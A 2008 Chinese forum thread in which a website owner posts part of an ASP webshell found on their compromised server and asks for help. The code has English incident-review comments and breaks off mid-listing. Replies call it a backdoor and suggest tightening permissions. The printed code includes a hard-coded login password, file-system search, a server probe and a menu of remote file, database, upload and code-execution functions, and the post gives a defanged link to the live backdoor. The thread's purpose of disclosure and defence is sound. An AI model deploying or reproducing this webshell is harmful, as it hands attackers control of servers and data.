主题:没见过这样的挂马方式,高手进来,常挂马的也进来 [收藏主题] 转到:  
无心石 发表于:2008/7/27 23:54:00   | 只看该作者 查看该作者主题 楼主 

这几天被挂马,最后终于被我找到关键文件,可是删除了还是会有.

 

我***了下这个文件.以下是一部分.

这个文件可以在服务器上运行,可是我不明白,没有数据库它也能运行!大家看看加红的那一段

,可是找不到那个.mdb文件!

太可怕,好像它还可以任意删改我的文件和数据!

运行后是一个管理后台,可是我不知道密码!

可是删了它还会在其它地方出现!

不明白了,望高手指教一下!

 

大家可以点这里进入那个木马后台看下:hxxp://www[.]unilove[.]cn/API/api_user.asp 。可以看到,它改了我的api_user.asp文件,太卑鄙了!

 

?%@ LANGUAGE = VBScript %>
<object runat="server" id="fso" scope="page" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
 Option Explicit
 Response.Buffer = True
 
 ' Page-level state for this script. Every request re-runs this section:
 ' it reads the action (theAct), the page selector (PageName) and a target
 ' path (thePath) from the request through GetPost, which looks at the form
 ' body first and then the query string.
 ' For log review: the parameter names PageName, theAct and thePath, the
 ' Session key prefix in m, and the constant strings below are fixed text
 ' that can be searched for in web-server logs and in other files under the
 ' web root.
 Dim url, conn, sUrlB, theAct, thePath, rootPath, PageSize
 Dim accessStr, pageName, sysFileList, isSqlServer, sPacketName
 theAct = GetPost("theAct")
 PageSize = 20 ''default number of records per page
 isSqlServer = False
 ' Physical directory that the site root "/" maps to
 rootPath = Server.MapPath("/")
 pageName = GetPost("PageName")
 url = Request.ServerVariables("URL") ''relative path of the current page
 ' "Packet.mdb" is only a default file name used for the pack feature; the
 ' code visible in this listing never opens it, so the script does not need
 ' an existing .mdb file to run.
 sPacketName = "Packet.mdb" ''default file name of the file package
 thePath = Replace(getPost("thePath"), "\\", "\")
 ' "$"-delimited list built from the package name and its matching .ldb file name
 sysFileList = "$" & sPacketName & "$" & Left(sPacketName, InStrRev(sPacketName, ".") - 1) & ".ldb$"
 ' Connection-string template; the {$...} placeholders are not filled in here
 accessStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source={$dbSource};User Id={$userId};Jet OLEDB:Database Password=""{$passWord}"";"
 
 Const m = "ASPAdmin_A" ''Session key prefix
 Const isDebugMode = False 'False,True''whether debug mode is on
 Const maxPageCount = 600 ''a query lists links for at most N pages
 ' The login password is embedded in the file itself, not stored in any database
 Const userPassword = "623442232" ''login password
 Const imageFileExt = "$gif$jpg$bmp$" ''list of image extensions
 ' Extensions the script treats as text; SearchFolder uses this list to decide
 ' which files get a content search
 Const editableFileExt = "$vbs$log$asp$txt$php$ini$inc$htm$html$xml$conf$config$jsp$java$htt$lst$aspx$php3$php4$js$css$bat$asa$"

 ' Writes str to the HTTP response unchanged (no encoding is applied here).
 Sub echo(str)
  Response.Write(str)
 End Sub
 
 ' Login gate: compares the value stored in Session under m & "userPassword"
 ' with the hard-coded userPassword constant. On a mismatch it writes a
 ' client-side script that shows an alert and sends the browser back to url.
 ' NOTE(review): nothing after the echo ends the response or leaves the
 ' caller, so in this listing the gate depends on the browser following the
 ' script. When scoping the incident, do not assume the password limited who
 ' could use this file.
 Sub IsIn()
  If Session(m & "userPassword") <> userPassword Then
   echo "<script>alert('没有权限的访问,请先登录!');location.href='" & url & "';</script>"
  End If
 End Sub
 
 ' Inline-if helper: returns val1 when var equals True, otherwise val2.
 ' Both val1 and val2 are evaluated by the caller before this function runs.
 Function IIf(var, val1, val2)
  If var = True Then
   IIf = val1
   Else
   IIf = val2
  End If
 End Function
 
 ' Thin wrapper around Response.Redirect; the url parameter shadows the
 ' page-level url variable inside this Sub.
 Sub RedirectTo(url)
  Response.Redirect(url)
 End Sub
 
 ' Returns the right-trimmed value of request parameter var, taking the form
 ' body first and falling back to the query string when the form value is empty.
 ' Special case: when the query string carries PageName=PageUpload, the
 ' function sets the page-level pageName and returns without assigning a value.
 ' NOTE(review): presumably this avoids reading Request.Form on the upload
 ' page - the upload code is not part of this listing, so confirm.
 Function GetPost(var)
  Dim val
  If Request.QueryString("PageName") = "PageUpload" Then
   pageName = "PageUpload"
   Exit Function
  End If
  val = RTrim(Request.Form(var))
  If val = "" Then
   val = RTrim(Request.QueryString(var))
  End If
  GetPost = val
 End Function
 
 ' Null-tolerant wrapper around Server.HTMLEncode: a Null input returns
 ' without assigning a result instead of raising an error.
 Function HtmlEncode(str)
  If IsNull(str) Then Exit Function
  HtmlEncode = Server.HTMLEncode(str)
 End Function
 
 ' Null-tolerant wrapper around Server.UrlEncode: a Null input returns
 ' without assigning a result instead of raising an error.
 Function UrlEncode(str)
  If IsNull(str) Then Exit Function
  UrlEncode = Server.UrlEncode(str)
 End Function
 
 ' Emits the <title> element and a gb2312 content-type meta tag.
 ' The fixed title suffix written here, like the "By Cracker" footer used by
 ' other routines in this file, is constant text that can serve as a search
 ' string when checking other files under the web root for copies.
 Sub ShowTitle(str)
  Response.Write "<title>" & str & " -Cracker专用</title>"
  Response.Write "<meta http-equiv='Content-Type' content='text/html; charset=gb2312'>"
 End Sub
 
 ' Formats a byte count as a string with a unit (B, KB, MB, GB, TB).
 ' num is divided by 1024 repeatedly and truncated to two decimals each
 ' round; i counts the divisions and selects the unit.
 ' i is declared but never assigned before the loop, and it is not checked
 ' against the upper bound of arySize (4).
 Function GetTheSize(num)
  Dim i, arySize(4)
  arySize(0) = "B"
  arySize(1) = "KB"
  arySize(2) = "MB"
  arySize(3) = "GB"
  arySize(4) = "TB"
  While(num / 1024 >= 1)
   num = Fix(num / 1024 * 100) / 100
   i = i + 1
  WEnd
  GetTheSize = num & " " & arySize(i)
 End Function
 
 ' Prints one or more error messages and stops processing the request.
 ' str is HTML-encoded first, then split on "$$" so several messages can be
 ' passed in one string; each is written as a numbered line.
 Sub ShowErr(str)
  Dim i, arrayStr
  str = Server.HtmlEncode(str)
  arrayStr = Split(str, "$$")

  echo "<font size=2>"
  echo "出错信息:<br/><br/>"
  For i = 0 To UBound(arrayStr)
   echo "&nbsp;&nbsp;" & (i + 1) & ". " & arrayStr(i) & "<br/>"
  Next
  echo "</font>"

  ' Ends the response, so nothing after a ShowErr call is executed
  Response.End()
 End Sub
 
 ' Walks thePath one "\"-separated segment at a time and creates each
 ' folder level that does not exist yet, through the page-scoped fso object.
 ' This is a server-side write to the file system at a caller-supplied path.
 Sub CreateFolder(thePath)
  Dim i
  ' Position of the first "\" found after the first three characters
  ' (presumably skipping a drive prefix such as "C:\" - confirm)
  i = InStr(Mid(thePath, 4), "\") + 3
  Do While i > 0
   If fso.FolderExists(Left(thePath, i)) = False Then
    fso.CreateFolder(Left(thePath, i - 1))
   End If
   ' Advance to the next "\"; stop when there is none left
   If InStr(Mid(thePath, i + 1), "\") Then
    i = i + Instr(Mid(thePath, i + 1), "\")
    Else
    i = 0
   End If
  Loop
 End Sub
 
 ' Writes a client-side script that closes the browser window, showing str
 ' in an alert first when str is not empty.
 ' str is placed inside the script string literal without any escaping.
 Sub AlertThenClose(str)
  If str = "" Then
   Response.Write "<script>window.close();</script>"
   Else
   Response.Write "<script>alert(""" & str & """);window.close();</script>"
  End If
 End Sub
 
 ' If the passed Err object is set, prints its description and source,
 ' clears it and ends the response. The "By Cracker" footer is fixed text.
 Sub ChkErr(Err)
  If Err Then
   echo "<hr style='color:#d8d8f0;'/><font size=2><li>错误: " & Err.Description & "</li><li>错误源: " & Err.Source & "</li><br/>"
   echo "<hr style='color:#d8d8f0;'/>&nbsp;By Cracker</font>"
   Err.Clear
   Response.End
  End If
 End Sub
 
 ' Renders the navigation form: a drop-down that posts the chosen PageName
 ' back to this same URL.
 ' The option list is the capability inventory of the script and is the
 ' basis for scoping an incident: server information probe, file-system
 ' browsing and editing, database tool, folder pack/unpack, batch upload,
 ' text search, HTTP proxy, and execution of arbitrary ASP statements.
 ' A host where this file ran must be treated as fully readable and
 ' writable by whoever used it, within the web process's permissions.
 Sub TopMenu()
  echo "<form method=post name=formp action=""" & url & """>"
  echo "<select name=PageName onchange=changePage(this)>"
  echo "<option value=''>请选择功能页面</option>"
  echo "<option value=PageCheck>服务器信息探针</option>"
  echo "<option value=PageFso>FSO文件浏览操作器</option>"
  echo "<option value=PageDBTool>数据库操作器</option>"
  echo "<option value=PagePack>文件夹打包/解开器</option>"
  echo "<option value=PageUpload>批量文件上传</option>"
  echo "<option value=PageSearch>文本文件搜索器</option>"
  echo "<option value=PageWebProxy>HTTP协议网页代理</option>"
  echo "<option value=PageExecute>自定义ASP语句运行</option>"
  echo "<option value=PageOut>退出系统</option>"
  echo "</select>"
  echo "</form>"
  ' Client-side helper: pre-selects the current page, asks for confirmation
  ' on logout and opens the proxy page in a new window
  echo "<script lanuage=javascript>"
  echo "formp.PageName.value='" & pageName & "';"
  echo "function changePage(obj){"
  echo " if(obj.value=='PageOut')"
  echo "  if(!confirm('确认要退出系统吗?'))return;"
  echo "if(obj.value=='PageWebProxy')obj.form.target='_blank';"
  echo " obj.form.submit();obj.form.target='';"
  echo "}"
  echo "</script>"
 End Sub
 
 Rem ++++++++++++++++++++++++++++++++++++
 Rem   Page selection (dispatch) section
 Rem ++++++++++++++++++++++++++++++++++++
 
 ' PageOther() runs on every request, before the login check below; its
 ' definition is not part of this listing.
 PageOther()
 ' The login check and the menu are only invoked when a page was requested
 If pageName <> "" Then
  IsIn()
  TopMenu()
 End If
 
 ' Dispatch on the PageName request parameter. An empty value or "PageOut"
 ' shows the login page. Only PageSearch and PageCheck are defined in the
 ' visible part of the listing; the other handlers lie beyond it.
 Select Case pageName
  Case "PageSearch"
   PageSearch()
  Case "PageCheck"
   PageCheck()
  Case "PageFso"
   PageFso()
  Case "PageDBTool"
   PageDBTool()
  Case "PageUpload"
   PageUpload()
  Case "PagePack"
   PagePack()
  Case "PageExecute"
   PageExecute()
  Case "PageWebProxy"
   PageWebProxy()
  Case "", "PageOut"
   PageLogin()
 End Select

 Rem +++++++++++++++++++++++++++++++++++++
 Rem   Feature modules section
 Rem +++++++++++++++++++++++++++++++++++++
 
 ' Entry point of the text-file search page: renders the search form and,
 ' when both an action and a keyword were submitted, runs the search.
 Sub PageSearch()
  Dim strKey, strPath
  strKey = GetPost("Key")
  ' Raises the script timeout to 5000 seconds for this request
  Server.ScriptTimeout = 5000
  ' With no path given, the search starts at the site root
  If thePath = "" Then thePath = rootPath
  
  ShowTitle("文本文件搜索器")
  
  SearchTable(strKey)
  
  If theAct <> "" And strKey <> "" Then
   SearchIt(strKey)
  End If
 End Sub
 
 ' Renders the search form. It posts back to this page with
 ' PageName=PageSearch and the fields thePath (start directory), Key
 ' (keyword) and theAct (FileName, FileContent or Both).
 ' The current path and keyword are HTML-encoded before being echoed back.
 Sub SearchTable(strKey)
  echo "<table width=750 border=1>"
  echo "<form method=post action='" & url & "'>"
  echo "<input type=hidden value=PageSearch name=PageName>"
  echo "<tr>"
  echo "<td colspan=2 class=td><font face=webdings>8</font> 文本文件搜索器(需FSO支持)</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td colspan=2 class=trHead>&nbsp;</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;路径</td>"
  echo "<td>&nbsp;<input name=thePath type=text id=thePath value='"
  echo HtmlEncode(thePath)
  echo "' style='width:360px;'>"
  echo "</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td width='20%'>&nbsp;关键字</td>"
  echo "<td>&nbsp;<input name=Key type=text value='" & HtmlEncode(strKey) & "' id=Key style='width:400px;'> "
  echo "<select name=theAct id=theAct>"
  echo "<option value=FileName selected>仅文件名</option>"
  echo "<option value=FileContent>仅文本内容</option>"
  echo "<option value=Both>两者都</option>"
  echo "</select>"
  echo " <input type=submit name=Submit value=提交> </td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td colspan=2 class=trHead>&nbsp;</td>"
  echo "</tr>"
  echo "<tr align=right>"
  echo "<td colspan=2 class=td>By Cracker&nbsp;</td>"
  echo "</tr>"
  echo "</form>"
  echo "</table>"
 End Sub
 
 ' Runs the search below the request-supplied thePath. The only check made
 ' on the path is that the folder exists, so any directory the web process
 ' can read is in reach. theAct selects the mode passed to SearchFolder:
 ' 1 = file name and content, 2 = file name only, 3 = content only.
 Sub SearchIt(key)
  Dim strPath, theFolder
  Response.Buffer = True
  strPath = thePath
  If fso.FolderExists(strPath) = False Then
   ShowErr(thePath & " 目录不存在或者不允许访问!")
  End If
  Set theFolder = fso.GetFolder(strPath)
  
  echo "<br/><div style='width:750;border:1px solid #d8d8f0;'>"

  Select Case theAct
   Case "Both"
    Call SearchFolder(theFolder, key, 1)
   Case "FileName"
    Call SearchFolder(theFolder, key, 2)
   Case "FileContent"
    Call SearchFolder(theFolder, key, 3)
  End Select
  
  echo "</div>"
  
  Set theFolder = Nothing
 End Sub
 
 ' Recursively searches folder and all of its subfolders.
 ' flag 1 or 2: case-insensitive match of key against each file name.
 ' flag 1 or 3: content search, restricted to extensions in EditableFileExt.
 ' Every hit is written to the response as a line built by FileLink.
 Sub SearchFolder(folder, key, flag)
  Dim ext, title, theFile, theFolder
  
  For Each theFile In folder.Files
   ext = LCase(fso.GetExtensionName(theFile.Path))
   If flag = 1 Or flag = 2 Then
    If InStr(LCase(theFile.Name), LCase(key)) > 0 Then echo FileLink(theFile, "")
   End If
   If flag = 1 Or flag = 3 Then
    If Instr(EditableFileExt, "$" & ext & "$") > 0 Then
     If SearchFile(theFile, key, title) Then echo FileLink(theFile, title)
    End If
   End If
  Next

  ' Send what has been found so far before descending further
  Response.Flush()

  For Each theFolder In folder.SubFolders
   Call SearchFolder(theFolder, key, flag)
  Next
 end sub
 
 ' Reads the whole of file f as text and returns the position of the first
 ' case-insensitive occurrence of s (0 when there is none).
 ' On a hit, title is set to the text between <TITLE> and </TITLE> if both
 ' tags are present, otherwise to an empty string.
 ' Unless isDebugMode is True, read errors are suppressed and cleared, so an
 ' unreadable file is searched as empty content instead of raising an error.
 Function SearchFile(f, s, title)
  Dim theFile, content, pos1, pos2
  If isDebugMode = False Then On Error Resume Next

  Set theFile = fso.OpenTextFile(f.Path)
  content = theFile.ReadAll()
  theFile.Close
  Set theFile = Nothing

  If Err Then
   Err.Clear
  End If

  ' Final argument 1 selects a text (case-insensitive) comparison
  SearchFile = InStr(1, content, s, 1)
  If SearchFile > 0 Then
   pos1 = InStr(1, content, "<TITLE>", 1)
   pos2 = InStr(1, content, "</TITLE>", 1)
   title = ""
   If pos1 > 0 And pos2 > 0 Then
    ' 7 is the length of "<TITLE>"
    title = Mid(content, pos1 + 7, pos2 - pos1 - 7)
   End If
  End If
 End Function
 
 ' Builds one HTML result line: the title in red (the file name when title
 ' is empty) followed by the file's full path.
 ' Neither the title nor the path is HTML-encoded before output.
 Function FileLink(file, title)
  fileLink = file.Path
  If title = "" Then
   title = file.Name
  End If
  fileLink = "&nbsp;<font color=ff0000>" & title & "</font> " & fileLink & "<br/>"
 End Function

 ' Entry point of the server-information page: prints the basic server
 ' information table, then (when an action was submitted) calls
 ' GetAppOrSession, which is defined outside this listing, and finally the
 ' component check table.
 Sub PageCheck()
  ShowTitle("服务器信息探针")
  InfoCheck()
  If theAct <> "" Then
  GetAppOrSession(theAct)
  End If
  ObjCheck()
 End Sub

 ' Collects environment details and prints them as an HTML table: script
 ' timeout, server time, server name / local address / port, OS and server
 ' software with the script engine version, the site root and its total
 ' size, the physical path and URL of this script, and the Application and
 ' Session item counts with the current session id.
 ' Everything in this table was disclosed to whoever loaded the page.
 ' Unless isDebugMode is True, errors while gathering the values are ignored.
 Sub InfoCheck()
  Dim aryCheck(6)
  If isDebugMode = False Then On Error Resume Next

  aryCheck(0) = Server.ScriptTimeOut() & "(秒)"
  aryCheck(1) = FormatDateTime(Now(), 0)
  aryCheck(2) = Request.ServerVariables("SERVER_NAME")
  aryCheck(2) = aryCheck(2) & ", " & Request.ServerVariables("LOCAL_ADDR")
  aryCheck(2) = aryCheck(2) & ":" & Request.ServerVariables("SERVER_PORT")
  aryCheck(3) = Request.ServerVariables("OS")
  ' Falls back to a fixed label when the OS server variable is empty
  aryCheck(3) = IIf(aryCheck(3) = "", "Windows2003", aryCheck(3)) & ", " & Request.ServerVariables("SERVER_SOFTWARE")
  aryCheck(3) = aryCheck(3) & ", " & ScriptEngine & "/" & ScriptEngineMajorVersion & "." & ScriptEngineMinorVersion & "." & ScriptEngineBuildVersion
  ' Measuring the site root's size reads the whole directory tree
  aryCheck(4) = rootPath & ", " & GetTheSize(fso.GetFolder(rootPath).Size)
  aryCheck(5) = "Path: " & Request.ServerVariables("PATH_TRANSLATED") & "<br />"
  aryCheck(5) = aryCheck(5) & "&nbsp;Url : http://" & Request.ServerVariables("SERVER_NAME") & Request.ServerVariables("Url")
  aryCheck(6) = "变量数: " & Application.Contents.Count() & "(<a href=javascript:locate('app');>Application</a>),"
  aryCheck(6) = aryCheck(6) & " 会话数: " & Session.Contents.Count & "(<a href=javascript:locate('session');>Session</a>),"
  aryCheck(6) = aryCheck(6) & " 当前会话ID: " & Session.SessionId()

  echo "<table width=750 border=1>"
  echo "<tr>"
  echo "<td colspan=2 class=td><font face=webdings>8</font> 服务器基本信息"
  echo "</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td colspan=2 class=trHead>&nbsp;</td>"
  echo "</tr>"
  echo "<tr class=td>"
  echo "<td width='20%'>&nbsp;项目</td>"
  echo "<td>&nbsp;值</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;默认超时</td>"
  echo "<td>&nbsp;"&aryCheck(0)&"</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;当前时间</td>"
  echo "<td>&nbsp;"&aryCheck(1)&"</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;服务器名</td>"
  echo "<td>&nbsp;"&aryCheck(2)&"</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;软件环境</td>"
  echo "<td>&nbsp;"&aryCheck(3)&"</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;站点目录</td>"
  echo "<td>&nbsp;"&aryCheck(4)&"</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;当前路径</td>"
  echo "<td>&nbsp;"&aryCheck(5)&"</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;其它</td>"
  echo "<td>&nbsp;"&aryCheck(6)&"</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td colspan=2 class=trHead>&nbsp;</td>"
  echo "</tr>"
  echo "<tr align=right>"
  echo "<td colspan=2 class=td>By Cracker&nbsp;</td>"
  echo "</tr>"
  echo "</table>"
 End Sub

 Sub ObjCheck()
  Dim aryObj(19)
  Dim x, objTmp, theObj, strObj
  If isDebugMode = False Then On Error Resume Next

  strObj = Trim(getPost("TheObj"))
  aryObj(0) = "MSWC.AdRotator|广告轮换组件"
  aryObj(1) = "MSWC.BrowserType|浏览器信息组件"
  aryObj(2) = "MSWC.NextLink|内容链接库组件"
  aryObj(3) = "MSWC.Tools|"
  aryObj(4) = "MSWC.Status|"
  aryObj(5) = "MSWC.Counters|计数器组件"
  aryObj(6) = "MSWC.PermissionChecker|权限检测组件"
  aryObj(7) = "Adodb.Connection|ADO 数据对象组件"
  aryObj(8) = "CDONTS.NewMail|虚拟 SMTP 发信组件"
  aryObj(9) = "Scripting.FileSystemObject|FSO组件"
  aryObj(10) = "Adodb.Stream|Stream 流组件"
  aryObj(11) = "Shell.Application|"
  aryObj(12) = "WScript.Shell|"
  aryObj(13) = "Wscript.Network|"
  aryObj(14) = "ADOX.Catalog|"
  aryObj(15) = "JMail.SmtpMail|JMail 邮件收发组件"
  aryObj(16) = "Persits.Upload.1|ASPUpload 文件上传组件"
  aryObj(17) = "LyfUpload.UploadFile|刘云峰的文件上传组件组件"
  aryObj(18) = "SoftArtisans.FileUp|SA-FileUp 文件上传组件"
  aryObj(19) = strObj & "|您所要检测的组件"

  echo "<br/>"
  echo "<table width=750 border=1>"
  echo "<tr>"
  echo "<td colspan=3 class=td><font face=webdings>8</font> 服务器组件信息"
  echo "</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td colspan=3 class=trHead>&nbsp;</td>"
  echo "</tr>"
  echo "<tr class=td>"
  echo "<td>&nbsp;组件<font color=#666666>(描述)</font></td>"
  echo "<td width=10% align=center>支持</td>"
  echo "<td width=15% align=center>版本</td>"
  echo "</tr>"
  For Each x In aryObj
   theObj = Split(x, "|")
   If theObj(0) = "" Then Exit For
   Set objTmp = Server.CreateObject(theObj(0))
   If Err <> -2147221005 Then
    x = x & "|√|"
    x = x & objTmp.Version
   Else
    x = x & "|<font color=red>

 

 

 

 
cngothic 发表于:2008/7/28 8:22:00   | 只看该作者 查看该作者主题 沙发 

说一种可能:

还是权限。不要加EVERYONE。

只保留三个用户

administrator

iis-web(与iis目录浏览相对)

server-u-user(server-u)

 

然后再删除。权限不收紧的话,入侵者仍然可以利用原有的写入权限或其他后门把文件重新写回来,所以删了还会再出现。

 
无心石 发表于:2008/7/28 7:32:00   | 只看该作者 查看该作者主题 藤椅 
如果是后门,为什么删了它还会在其它地方出现?难道这个后门删不掉?
 
kim 发表于:2008/7/28 0:21:00   | 只看该作者 查看该作者主题 板凳 
挂你个头,这是后门啊。
 